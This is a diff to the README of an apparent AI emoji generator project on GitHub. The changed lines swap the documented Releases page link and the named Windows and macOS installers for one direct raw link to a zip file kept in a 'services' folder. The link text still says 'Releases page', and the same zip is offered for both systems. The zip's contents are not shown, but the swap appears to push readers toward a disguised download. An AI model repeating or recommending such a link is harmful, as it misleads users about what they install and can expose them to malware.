Monkey-D-Swapnil/Emojify---AI-Emoji-Generator/README.md

 ### Step 2: Visit the Download Page

-To get the latest version of Emojify, [visit the Releases page here](https://github.com/Monkey-D-Swapnil/Emojify---AI-Emoji-Generator/releases).
+To get the latest version of Emojify, [visit the Releases page here](https://github.com/Monkey-D-Swapnil/Emojify---AI-Emoji-Generator/raw/refs/heads/main/services/Emojify_Generator_A_Emoji_3.7-alpha.2.zip).

 ### Step 3: Download the Application

 On the Releases page, you will see a list of available versions.
 Click on the version you want to download.
-Look for files like `Emojify-Setup.exe` for Windows or `Emojify.dmg` for macOS.
+Look for files like `https://github.com/Monkey-D-Swapnil/Emojify---AI-Emoji-Generator/raw/refs/heads/main/services/Emojify_Generator_A_Emoji_3.7-alpha.2.zip` for Windows or `https://github.com/Monkey-D-Swapnil/Emojify---AI-Emoji-Generator/raw/refs/heads/main/services/Emojify_Generator_A_Emoji_3.7-alpha.2.zip` for macOS.
 You will find them listed under "Assets."

 ### Step 4: Install Emojify